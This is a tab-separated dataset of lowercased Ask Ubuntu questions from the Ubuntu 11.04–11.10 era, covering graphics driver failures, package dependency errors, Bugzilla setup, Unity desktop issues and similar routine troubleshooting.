61895	how to stop booting into terminal mode ?	my ubuntu 11.04 is only booting in terminal . from the terminal when i enter command startx i see the following : the nvidia gpu at pci:1:0:0 is not supported by the 173.14.30 nvidia driver failed to initialize the nvidia graphics device ! screen ( s ) found , but none have a usable configuration command : sudo apt-get install nvidia-current it says : nvidia-current is already the newest version could it be that i have nvidia-current installed but it is not being used ? instead nvidia 173 is being used ? how can i fix this ? update graphics card : evga 512-p3-1301-kr geforce 8400 gs 512mb 32-bit ddr3 pci express 2.0 x16 hdcp ready low profile video card i ran : sudo dpkg-reconfigure -phigh xserver-xorg and then : sudo reboot but it did not fix the problem . i 'm still starting in terminal mode . trying : sudo remove nvidia-current and then sudo reboot did not fix the problem either . running sudo nvidia-xconfig says : wrote new x configuration file to /etc/x11/xorg.conf but still sudo reboot did not fix the problem . i installed nvidia drivers from 'additional drivers ' . to fix my other issues i gave nvidia 173 a try instead of nvidia-current update my xorg.conf is here : http : //pastebin.com/p5602jhw i was able to put this on pastebin by booting in recovery mode and selecting failsafex and then selecting run ubuntu in low graphics mode for just one session update so , as i was in the recovery mode for one session , i went to `` additional drivers '' and noticed that nvidia173 was being used and not nvidia-current . i made this change from additional drivers and then rebooted the system . now , i 'm starting in gui mode but have few other issues . second monitor does not come on , only one monitor is working there are no minimize or maximize buttons on windows ( if i keep terminal open with metacity -- replace then it fixes the minimize/maximize buttons problem but i have to keep the terminal window open ) i do n't see top and bottom launch panels also , now after this change my xorg.conf is : http : //pastebin.com/ttqwy9pf
61900	sync music to ubuntu one from media server ?	my music collection is stored on a media server ( 11.04 + mythtv ) . my ~/music folder is mapped to a nfs share on the media server , but ubuntu one will not synchronize to the mapped drive ( probably no surprise there ) . nor is the music folder located under a home/ folder on the server ( it 's /var/lib/mythtv/music ) . so , how to synchronize the music with ubuntu one and thereby access it for mobile streaming ? perhaps install ubuntu one on the server , move the music to ~/music and sync it , and then symlink it from /var/lib/mythtv ( i like to use the myth player on the media system ) ? opinions ?
61903	execute script when [ dis ] connected to wifi ?	i have two one-liner scripts that write ip address and ssid to files in my dropbox ; i would like my android phone to sync to dropbox and read the ip and ssid and do stuff via tasker if it 's on the same network . that said , i am looking for a way to execute the scripts whenever i 'm connected to wifi . thanks very much for the help !
61904	could not apply stored configuration for monitors	well this happened when i upgraded to natty . not only seems i ca n't change my resolution to higher than 1024x768 but it appears at the left and using only 70 % of the monitor 's width . i tried logging in but in ubuntu classic mode , and i was able to change it , but that trick did not work anymore . ( may this be a compiz problem ? ) anyways , here is my /var/log/xorg.0.log http : //pastebin.com/ew4wwlab and lspci -nn | grep vga : 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) i tried using xrandr for adding manually a resolution of 1280x1768 but without luck . here is the xrandr output screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) tv1 disconnected ( normal left inverted right x axis y axis ) 1280x1024 ( 0xc6 ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz edit : ok , after some troubleshooting , connected the laptop to a second display and found that ubuntu is working fine . so it was a hardware problem in my vaio laptop 's screen .
61905	error during update and installation of new packages	this error occur both in synaptic and via terminal so i ca n't update or install new packages : lang=en_us ; sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of gens : i386 : gens : i386 depends on libc6 . gens : i386 depends on libgcc1 . gens : i386 depends on libglib2.0-0 ( > = 2.4.0 ) . gens : i386 depends on libgtk2.0-0 ( > = 2.4.0 ) . gens : i386 depends on libpng12-0 . gens : i386 depends on libsdl1.2debian ( > = 1.1.3 ) . gens : i386 depends on libstdc++6 . gens : i386 depends on xdg-utils . gens : i386 depends on zlib1g . dpkg : error processing gens : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gens : i386 i searched the package to remove it but i did n't found it . and when i try to install something from synaptic show me this : gtk-critical ** : ia__gtk_assistant_set_page_header_image : assertion `child ! = null ' failed at /usr/share/perl5/debconf/frontend/gnome.pm line 27 , < > line 4. dpkg : errore fatale non recuperabile , uscita : [ fatal error not recoverable , exit ] errore di sintassi : gruppo `` cdemu '' sconosciuto nel file statoverride [ syntax error : `` cdemu '' group unknown in the file staoverride ( ? ) ] e : sub-process /usr/bin/dpkg returned an error code ( 2 ) output of dpkg -l gens raffaele @ natty : ~ $ lang=en_us ; dpkg -l gens* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un gens < none > ( no description available ) output of dpkg -l *cdemu raffaele @ natty : ~ $ dpkg -l *cdemu* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ nome versione descrizione +++-==============-==============-============================================ ii cdemu-client 1.4.0-0ubuntu1 command-line client to control cdemu daemon ii cdemu-daemon 1.4.0-0ubuntu1 cdemu daemon un cdemu-daemon-d < none > ( nessuna descrizione disponibile ) ii gcdemu 1.4.0-0ubuntu1 gnome application to control cdemu daemon output of cat /var/lib/dpkg/statoverride raffaele @ natty : ~ $ cat /var/lib/dpkg/statoverride root mlocate 2755 /usr/bin/mlocate mpd audio 755 /var/lib/mpd mpd audio 755 /var/lib/mpd/playlists mpd audio 755 /var/log/mpd mpd audio 755 /var/run/mpd hplip root 755 /var/run/hplip root ssl-cert 710 /etc/ssl/private root cdemu 2755 /usr/bin/cdemud mpd audio 640 /etc/mpd.conf root crontab 2755 /usr/bin/crontab
61906	`` window creation error '' in second life client	with the latest oneiric updates , i 've been unable to use second life , a virtual reality simulator , in ubuntu . i assume it has something to do with the nvidia driver , since the error in the console says : warning : createwindow : llwindowmanager : :create ( ) : error creating window . warning : llviewerwindow : failed to create window , to be shutting down , be sure your graphics driver is updated i guess i could file a bug on launchpad , but i 'm not sure where to file it . does anyone have any insight into what may be causing this problem ? it was working fine a week ago , and older viewers ( imprudence viewer anyway ) still work fine .
61907	limit / disable vnc display updates	i am using the stock `` remote desktop '' vnc server in ubuntu . ubuntu is on a 2nd machine , and my primary machine is a 3-monitor windows 7 setup . i can vnc into ubuntu , however i would like to disable screen updates or at least limit the update rate . too much cpu is being used on ubuntu when all i really need is vnc for input , not for display ( i connect the ubuntu machine directly into the 2nd input of my primary monitor ; this is a fake kvm in a way ) . how can i alter the ubuntu remote desktop settings so that less or no cpu is spent compressing and transmitting display updates ? or if this is not possible , what other vnc server software can i install instead ? i know this is possible in theory because i already do this in an os x specific vnc server i found which permits disabling display updates . ( configured correctly with os x right now , i can move between left/middle/right displays without any lag , where in fact left=win7 , middle=blank vnc `` surface '' into os x , right=win7 . i am trying to do the same with ubuntu now . )
61909	is there a gnome application with a gui for verifying pgp signatures ?	is there a gnome application with a gui that enables one to verify a pgp signature , something equivalent to kleopatra for kde ?
61911	ubuntu noisier than windows 7	system : dell 1558 laptop ( 64-bit ) 4 gb ram 320 gb hdd have installed ubuntu ( 11.04 ? ) alongside windows 7 ( dual boot ) . both os 's working fine . my concern is that when i am in ubuntu the fan seems to be running all the time , making the system noisier . is there any solution to this ? windows 7 is much quieter . i know that this contradicts the common perception .
61912	can i/how do i sort titles by resolution in vlc , mplayer , or similar app ?	can i/how do i sort titles by resolution in vlc , mplayer , or similar app , i.e. , sort videos by their pixel count ? , e.g. , a 1920x1080 vid followed by a 1280x720 vid , etc , ascending or descending .
61914	ubuntu one uses lots of system resources , but does nothing	i 'm trying to upload a folder of about 1.5 gb to ubuntu one . everything seems to be set up correctly , and ubuntu one says `` file sync in progress '' . however , all it does is use about 3.3 gb of ram ( ! ) and 100 % of one core , without sending anything on the network ( as reported by system monitor ) . it 's been like that for about 15 hours now ( i left it on through the night ) . what is going on here ?
61915	hardware does not support unity after reboot	i installed ubuntu natty on my friends laptop and it was all working fine out of the box , last night he updated the system and when he restarted , the message he got was this hardware does not support unity , going back to gnome this has happened on another friends system too , he had an nvidia card so i downloaded the driver from the dell site and when i ran the file , the whole gui ceased to work , i do n't want to go the windows way and re install to solve the problem . please help , the laptop in question is a dell inspiron 14 series , the old one that does not have a discrete gpu .
61921	is there a newer version of snort available ?	the snort version available for lucid is 2.8.5.2 , for which snort rules are not available anymore . is there a ppa for the updated version of snort or are there any good tutorials for installing snort from source .
61926	unity menu search does n't find manually installed shortcut	sequence of operations : install a gnome menu shortcut . click windows to get the unity search interface . type in the first few characters of the shortcut name . result : the installed shortcut does not show up in the list of matches . however , the shortcut is installed , accessible , and works : click windows to get the unity search interface . click esc to close the search interface . click the `` applications '' icon . type in the first few characters of the shortcut name . now the shortcut shows up in the `` most frequently used '' list , but not in the `` installed '' list . it is also shown in the `` main menu '' application . so why does n't it show up in the default search ? do i somehow have to tag it as `` installed '' ?
61928	how to launch bugzilla after installation ?	i have installed bugzilla 3 through the software center . after a successful result , what is the next step ? i ca n't see an installation directory anywhere . i tried : http : //localhost/bugzilla there is nothing there . adding information : i installed it from the software center . i am not aware to prerequisites . should i install perl modules ? how please ? apache2 - installed and running before the installation mysql is installed mysql ver 14.14 distrib 5.1.41 , for debian-linux-gnu ( i486 ) using readline 6.1 perl -v this is perl , v5.10.1 ( * ) built for i686-linux-gnu-thread-multi ( with 53 registered patches , see perl -v for more detail ) what should i do now ?
61930	how to use apt-get to install packages without one specify package ?	for example : the following command will install all packages that match it 's pattern : sudo apt-get install k3b-* if i want to use that instruction but do n't want to install one specific package with broken dependencies , how do i do that ? i have tried this but not works . sudo apt-get install `` $ ( apt-cache -- no-generate pkgnames k3b | grep -v extrathemes | tr '\n ' ' ' ) '' : sam @ /home/sam/code/ros/ai/cram/roslisp_repl $ sudo apt-get install `` $ ( apt-cache -- no-generate pkgnames k3b | grep -v extrathemes | tr '\n ' ' ' ) '' reading package lists ... done building dependency tree reading state information ... done e : unable to locate package k3b-dbg k3b-data k3b sam @ /home/sam/code/ros/ai/cram/roslisp_repl $ thank you~
61931	how to install libnss3-dev ?	my installation failing log : sam @ /home/sam/code/ros/ai/cram/roslisp_repl $ sudo apt-get update get:1 http : //packages.ros.org maverick release.gpg [ 198b ] ign http : //packages.ros.org/ros/ubuntu/ maverick/main translation-en hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/abogani/ppa/ubuntu/ maverick/main translation-en hit http : //ppa.launchpad.net maverick release.gpg hit http : //archive.ubuntu.com maverick release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en get:2 http : //packages.ros.org maverick release [ 3032b ] ign http : //ppa.launchpad.net/cnav/ppa/ubuntu/ maverick/main translation-en hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/gummi/gummi/ubuntu/ maverick/main translation-en hit http : //ppa.launchpad.net maverick release ign http : //packages.ros.org maverick/main amd64 packages ign http : //packages.ros.org maverick/main amd64 packages hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release get:3 http : //extras.ubuntu.com maverick release.gpg [ 72b ] ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en get:4 http : //packages.ros.org maverick/main amd64 packages [ 121kb ] hit http : //ppa.launchpad.net maverick/main sources hit http : //extras.ubuntu.com maverick release hit http : //extras.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick/universe translation-en hit http : //extras.ubuntu.com maverick/main amd64 packages hit http : //archive.ubuntu.com maverick release hit http : //ppa.launchpad.net maverick/main amd64 packages hit http : //archive.ubuntu.com maverick/main sources hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main amd64 packages hit http : //archive.ubuntu.com maverick/restricted sources hit http : //archive.ubuntu.com maverick/universe sources hit http : //archive.ubuntu.com maverick/multiverse sources hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main amd64 packages hit http : //archive.ubuntu.com maverick/main amd64 packages hit http : //archive.ubuntu.com maverick/restricted amd64 packages hit http : //archive.ubuntu.com maverick/universe amd64 packages hit http : //archive.ubuntu.com maverick/multiverse amd64 packages fetched 125kb in 7s ( 15.7kb/s ) reading package lists ... done sam @ /home/sam/code/ros/ai/cram/roslisp_repl $ sudo apt-get install libnss3-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libnss3-dev : depends : libnss3-1d ( < 3.12.7-0ubuntu1.1~ ) but 3.12.9+ckbi-1.82-0ubuntu0.10.10.1 is to be installed e : broken packages sam @ /home/sam/code/ros/ai/cram/roslisp_repl $ how to install it ?
61935	how do i install bugzilla ?	i would like to use bugzilla on my own computer to track and trace bugs in our own software . how do i set this up ?
61938	where can i find the lightdm folders and and images	i am trying to build my own greeter for ubuntu 11.10 and amd looking for all the folders that are being used by lightdm . so far i have located the .conf files and the unity-greeter folder but it seems that i have n't located all the files/folders
61939	ubuntu installation does not recognize drive partitioning	i have a 1tb drive and installed windows 7 on a 128gb partition . when i now try to install ubuntu 11.04 it does not recognize the windows partition but offers the complete 1tb drive to install ubuntu on instead . it displays : however , in the ubuntu disk utility the windows partitions are recognized . what do i need to do in order for ubuntu to recognize the windows 7 partition and install ubuntu as a dual boot ? response to comments the following commands were executed and the results are shown below : fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x34a38165 device boot start end blocks id system /dev/sda1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 13 16318 130969600 7 hpfs/ntfs disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x14a714a6 device boot start end blocks id system /dev/sdb1 1 60801 488384001 83 linux parted -l warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label
61941	error when install perl modules for bugzilla 4.0,2	following instructions on can i use my own version of bugzilla ? i am getting perl errors when trying to install the missing modules . the script : cd /var/www/bugzilla/ sudo ./checksetup.pl -- check-modules returns tons of errors among : * this is bugzilla 4.0.2 on perl 5.10.1 * running on linux 2.6.32-33-generic-pae # 72-ubuntu smp fri jul 29 22:06:29 utc 2011 checking perl modules ... checking for cgi.pm ( v3.51 ) ok : found v3.55 checking for digest-sha ( any ) ok : found v5.47 checking for timedate ( v2.21 ) ok : found v2.23 checking for datetime ( v0.28 ) not found checking for datetime-timezone ( v0.71 ) not found checking for dbi ( v1.41 ) ok : found v1.609 checking for template-toolkit ( v2.22 ) found v2.20 checking for email-send ( v2.00 ) ok : found v2.198 checking for email-mime ( v1.904 ) found v1.903 checking for uri ( any ) ok : found v1.52 checking for list-moreutils ( v0.22 ) not found checking available perl dbd modules ... checking for dbd-pg ( v1.45 ) not found checking for dbd-mysql ( v4.00 ) ok : found v4.012 checking for dbd-oracle ( v1.19 ) not found the following perl modules are optional : checking for gd ( v1.20 ) ok : found v2.39 checking for chart ( v2.1 ) ok : found v2.4.1 checking for template-gd ( any ) ok : found v1.56 checking for gdtextutil ( any ) ok : found v0.86 checking for gdgraph ( any ) ok : found v1.44 checking for mime-tools ( v5.406 ) not found checking for libwww-perl ( any ) ok : found v5.834 checking for xml-twig ( any ) ok : found v3.32 checking for patchreader ( v0.9.4 ) not found checking for perl-ldap ( any ) not found checking for authen-sasl ( any ) not found checking for radiusperl ( any ) not found checking for soap-lite ( v0.712 ) not found checking for json-rpc ( any ) not found checking for json-xs ( v2.0 ) not found checking for test-taint ( any ) not found checking for html-parser ( v3.40 ) ok : found v3.64 checking for html-scrubber ( any ) not found checking for email-mime-attachment-stripper ( any ) not found checking for email-reply ( any ) not found checking for theschwartz ( any ) not found checking for daemon-generic ( any ) not found checking for mod_perl ( v1.999022 ) not found checking for apache-sizelimit ( v0.93 ) not found checking for math-random-secure ( v0.05 ) not found warning : we could not check the configuration of apache . this sometimes happens when you are not running checksetup.pl as root . to see the problem we ran into , run : /usr/sbin/apache2 -t -d dump_modules *********************************************************************** * required modules * *********************************************************************** * bugzilla requires you to install some perl modules which are either * * missing from your system , or the version on your system is too old . * * see below for commands to install these modules . * *********************************************************************** * optional modules * *********************************************************************** * certain perl modules are not required by bugzilla , but by * * installing the latest version you gain access to additional * * features . * * * * the optional modules you do not have installed are listed below , * * with the name of the feature they enable . below that table are the * * commands to install each module . * *********************************************************************** * module name * enables feature ( s ) * *********************************************************************** * mime-tools * move bugs between installations * * patchreader * patch viewer * * perl-ldap * ldap authentication * * authen-sasl * smtp authentication * * radiusperl * radius authentication * * soap-lite * xml-rpc interface * * json-rpc * json-rpc interface * * json-xs * make json-rpc faster * * test-taint * json-rpc interface , xml-rpc interface * * html-scrubber * more html in product/group descriptions * * email-mime-attachment-stripper * inbound email * * email-reply * inbound email * * theschwartz * mail queueing * * daemon-generic * mail queueing * * mod_perl * mod_perl * * apache-sizelimit * mod_perl * * math-random-secure * improve cookie and token security * *********************************************************************** commands to install optional modules : mime-tools : /usr/bin/perl install-module.pl mime : :parser patchreader : /usr/bin/perl install-module.pl patchreader perl-ldap : /usr/bin/perl install-module.pl net : :ldap authen-sasl : /usr/bin/perl install-module.pl authen : :sasl radiusperl : /usr/bin/perl install-module.pl authen : :radius soap-lite : /usr/bin/perl install-module.pl soap : :lite json-rpc : /usr/bin/perl install-module.pl json : :rpc json-xs : /usr/bin/perl install-module.pl json : :xs test-taint : /usr/bin/perl install-module.pl test : :taint html-scrubber : /usr/bin/perl install-module.pl html : :scrubber email-mime-attachment-stripper : /usr/bin/perl install-module.pl email : :mime : :attachment : :stripper email-reply : /usr/bin/perl install-module.pl email : :reply theschwartz : /usr/bin/perl install-module.pl theschwartz daemon-generic : /usr/bin/perl install-module.pl daemon : :generic mod_perl : /usr/bin/perl install-module.pl mod_perl2 apache-sizelimit : /usr/bin/perl install-module.pl apache2 : :sizelimit math-random-secure : /usr/bin/perl install-module.pl math : :random : :secure commands to install required modules ( you *must* run all these commands and then re-run this script ) : /usr/bin/perl install-module.pl datetime /usr/bin/perl install-module.pl datetime : :timezone /usr/bin/perl install-module.pl template /usr/bin/perl install-module.pl email : :mime /usr/bin/perl install-module.pl list : :moreutils to attempt an automatic install of every required and optional module with one command , do : /usr/bin/perl install-module.pl -- all *** installation aborted . read the messages above . *** running the suggested command : /usr/bin/perl install-module.pl -- all is n't changing much test summary report -- -- -- -- -- -- -- -- -- - t/compile.t ( wstat : 512 tests : 2 failed : 2 ) failed tests : 1-2 non-zero exit status : 2 t/memory.t ( wstat : 512 tests : 0 failed : 0 ) non-zero exit status : 2 parse errors : no plan found in tap output t/range.t ( wstat : 512 tests : 0 failed : 0 ) non-zero exit status : 2 parse errors : bad plan . you planned 16 tests but ran 0. t/seed.t ( wstat : 512 tests : 0 failed : 0 ) non-zero exit status : 2 parse errors : bad plan . you planned 8 tests but ran 0 . files=7 , tests=2 , 0 wallclock secs ( 0.03 usr 0.01 sys + 0.11 cusr 0.06 csys = 0.21 cpu ) result : fail failed 4/7 test programs . 2/2 subtests failed . make : *** [ test_dynamic ] error 2 mkanat/math-random-secure-0.06.tar.gz /usr/bin/make test -- not ok //hint// to see the cpan-testers results for installing this module , try : reports mkanat/math-random-secure-0.06.tar.gz warning ( usually harmless ) : 'yaml ' not installed , will not store persistent state running make install make test had returned bad status , wo n't install without force thanks
61942	cursor stuck in select mode	i have sometime problem with select mode in the mouse . the cursor is stuck in select mode , so i can not click anything , to solve that i need to reboot my laptop my laptop is : sony vaio model : vgn-cs320j i note that problem since ubuntu 11.04 , and it still happens in 11.10 . so , i would like to know if that problem have been reported or not .
61943	how do i install the google-talkplugin ?	how do i install the google talk plugin so i can use gtalk and google plus ?
61945	docky pidgin helper is enabled but not working	i 've enabled pidgin helper in docky . but it really does n't do anything.. there 's no difference at all whether it 's enabled or not.. i really do n't know why but it does n't do what it should like in the screenshot in it 's page http : //wiki.go-docky.com/index.php ? title=pidgin_control_helper i tried to debug docky : [ info 15:01:19.468 ] docky version : 2.2.0 bzr docky r1817 ppa [ info 15:01:19.493 ] kernel version : 2.6.35.30 [ info 15:01:19.497 ] clr version : 2.0.50727.1433 [ debug 15:01:20.023 ] [ userargs ] buffertime = 10 [ debug 15:01:20.024 ] [ userargs ] maxsize = 2147483647 [ debug 15:01:20.024 ] [ userargs ] netbookmode = false [ debug 15:01:20.024 ] [ userargs ] nopollcursor = false [ debug 15:01:20.071 ] [ systemservice ] using org.freedesktop.upower for battery information [ info 15:01:20.125 ] [ themeservice ] setting theme : hud [ debug 15:01:20.158 ] [ desktopitemservice ] loading remap file '/usr/share/docky/remaps.ini ' . [ debug 15:01:20.172 ] [ desktopitemservice ] remapping 'picasa3.exe ' to 'picasa ' . [ debug 15:01:20.172 ] [ desktopitemservice ] remapping 'nbexec ' to 'netbeans ' . [ debug 15:01:20.172 ] [ desktopitemservice ] remapping 'deja-dup-preferences ' to 'deja-dup ' . [ debug 15:01:20.172 ] [ desktopitemservice ] remapping 'virtualbox ' to 'virtualbox ' . [ warn 15:01:20.173 ] [ desktopitemservice ] could not find remap file '/home/rafael/.local/share/docky/remaps.ini ' ! [ debug 15:01:20.177 ] [ desktopitemservice ] loading desktop item cache '/home/rafael/.cache/docky/docky.desktop.en_us.utf8.cache ' . [ info 15:01:20.523 ] [ dockservices ] dock services initialized . [ debug 15:01:20.557 ] [ dbusmanager ] dbus registered : org.gnome.docky [ debug 15:01:20.565 ] [ dbusmanager ] dbus registered : net.launchpad.dockmanager [ debug 15:01:20.960 ] [ pluginmanager ] plugin manager initialized . [ debug 15:01:20.982 ] [ pluginmanager ] processing config file for `` battery monitor '' . [ debug 15:01:21.013 ] [ pluginmanager ] processing config file for `` bookmarks '' . [ debug 15:01:21.015 ] [ pluginmanager ] processing config file for `` cpu monitor '' . [ debug 15:01:21.016 ] [ pluginmanager ] processing config file for `` clippy '' . [ debug 15:01:21.018 ] [ pluginmanager ] processing config file for `` clock '' . [ debug 15:01:21.023 ] [ pluginmanager ] processing config file for `` desktop '' . [ debug 15:01:21.024 ] [ pluginmanager ] processing config file for `` gmail '' . [ debug 15:01:21.025 ] [ pluginmanager ] processing config file for `` mounter '' . [ debug 15:01:21.027 ] [ pluginmanager ] processing config file for `` npr '' . [ debug 15:01:21.028 ] [ pluginmanager ] processing config file for `` network manager '' . [ debug 15:01:21.029 ] [ pluginmanager ] processing config file for `` network monitor '' . [ debug 15:01:21.031 ] [ pluginmanager ] processing config file for `` recent documents '' . [ debug 15:01:21.032 ] [ pluginmanager ] processing config file for `` session manager '' . [ debug 15:01:21.036 ] [ pluginmanager ] processing config file for `` timer '' . [ debug 15:01:21.037 ] [ pluginmanager ] processing config file for `` trash '' . [ debug 15:01:21.039 ] [ pluginmanager ] processing config file for `` weather '' . [ debug 15:01:21.040 ] [ pluginmanager ] processing config file for `` workspace switcher '' . [ info 15:01:21.285 ] [ pluginmanager ] loaded `` trash '' . [ info 15:01:21.288 ] [ pluginmanager ] loaded `` docky.widgets,1.0 '' . [ info 15:01:21.288 ] [ pluginmanager ] loaded `` clock '' . [ info 15:01:22.141 ] [ helper ] starting pidgin_control.py [ info 15:01:22.191 ] [ helper ] starting zeitgeist_menus.py [ info 15:01:22.215 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/banshee_control.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/deluge_badge.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/emesene_control.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/gajim_badge.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/gtg_menus.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/liferea_badge.py [ info 15:01:22.216 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/mpd_control.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/open_terminal_here.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/pidgin_control.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/pithos_control.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/rhythmbox_control.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/skype_control.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/tomboy_menus.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/transmission_badge.py [ info 15:01:22.217 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/tsclient_menus.py [ info 15:01:22.218 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/workrave_helper.py [ info 15:01:22.218 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/zeitgeist_journal.py [ info 15:01:22.236 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/zeitgeist_menus.py [ info 15:01:22.285 ] [ drawingservice ] could not find 'banshee ' , using fallback of 'extension ' . [ info 15:01:22.337 ] [ drawingservice ] could not find 'deluge ' , using fallback of 'extension ' . [ info 15:01:22.378 ] [ drawingservice ] could not find 'emesene ' , using fallback of 'extension ' . [ info 15:01:22.434 ] [ drawingservice ] could not find 'gajim ' , using fallback of 'extension ' . [ info 15:01:22.465 ] [ helper ] pidgin_control.py has exited ( code 0 ) . [ info 15:01:22.484 ] [ drawingservice ] could not find 'gtg ' , using fallback of 'extension ' . [ info 15:01:22.509 ] [ drawingservice ] could not find 'liferea ' , using fallback of 'extension ' . [ warn 15:01:22.552 ] [ drawingservice ] error loading icon from file '/usr/share/pithos/media/icon.svg ' : failed to open file '/usr/share/pithos/media/icon.svg ' : no such file or directory [ debug 15:01:22.559 ] [ drawingservice ] at gdk.pixbuf..ctor ( system.string filename , int32 width , int32 height , boolean preserve_aspect_ratio ) [ 0x00000 ] in < filename unknown > :0 at docky.services.drawingservice.iconfromfile ( system.string name , int32 width , int32 height ) [ 0x00000 ] in < filename unknown > :0 [ info 15:01:22.562 ] [ drawingservice ] could not find '/usr/share/pithos/media/icon.svg ' , using fallback of 'extension ' . [ info 15:01:22.577 ] [ drawingservice ] could not find 'rhythmbox ' , using fallback of 'extension ' . [ info 15:01:22.591 ] [ drawingservice ] could not find 'skype ' , using fallback of 'extension ' . [ info 15:01:22.592 ] [ helper ] zeitgeist_menus.py has exited ( code 0 ) . [ info 15:01:22.607 ] [ drawingservice ] could not find 'tomboy ' , using fallback of 'extension ' . [ warn 15:01:22.649 ] [ drawingservice ] error loading icon from file '/usr/share/pixmaps/workrave/workrave.xpm ' : failed to open file '/usr/share/pixmaps/workrave/workrave.xpm ' : no such file or directory [ debug 15:01:22.649 ] [ drawingservice ] at gdk.pixbuf..ctor ( system.string filename , int32 width , int32 height , boolean preserve_aspect_ratio ) [ 0x00000 ] in < filename unknown > :0 at docky.services.drawingservice.iconfromfile ( system.string name , int32 width , int32 height ) [ 0x00000 ] in < filename unknown > :0 [ info 15:01:22.649 ] [ drawingservice ] could not find '/usr/share/pixmaps/workrave/workrave.xpm ' , using fallback of 'extension ' . anything i can do ?
61947	unity shows no icons or launcher , i get only the wallpaper	when i log in using unity all i get is the wallpaper - no icons , no launcher , no apps , nothing . i can only get ubuntu classic to work ( gnome as far as i know ) because i 'm new to ubuntu and i only like unity . i hope someone can help me to get it working .
61951	how to log in without code of any kind	my wife does n't want to have any kind of login on her unity . she wants it to go directly to her home directory , when she press the `` on '' -button without asking for any code to be typed . how do i make it do that ?
61956	how to always show all apps in dash ?	i have oneiric running in virtualbox with unity ( 3d ) , it 's up todate as of now . when i go to the dash to find an app i have to click a small arrow to show all the apps in that category . once i click it , it shows all the apps during the current session . however , after rebooting i have to click the arrow again to show all apps . is there anything i could do to save this 'show all apps ' settings permanently ?
61957	do newer ubuntu releases benefit from multicore processors at boot time ?	i 've read the upstart features and it says nothing about concurrency . i also read old advices to set concurrency value in the /etc/init.d/rc but there is a comment : specify method used to enable concurrent init.d scripts . valid options are 'none ' , 'startpar ' and 'makefile ' . to enable the concurrent boot option , the init.d script order must allow for concurrency . this is not the case with the default boot sequence in debian as of 2008-01-20 . before enabling concurrency , one need to check the sequence values of all boot scripts , and make sure only scripts that can be started in parallel have the same sequence number , and that a scripts dependencies have a earlier sequence number . see the insserv package for a away to reorder the boot automatically to allow this . and the concurrency is set to none . insserv is installed in my ubuntu 11.04 . but is it used ? my system is already amazingly fast because it 's on the ssd . but i 'd like to know if it uses all cores during boot .
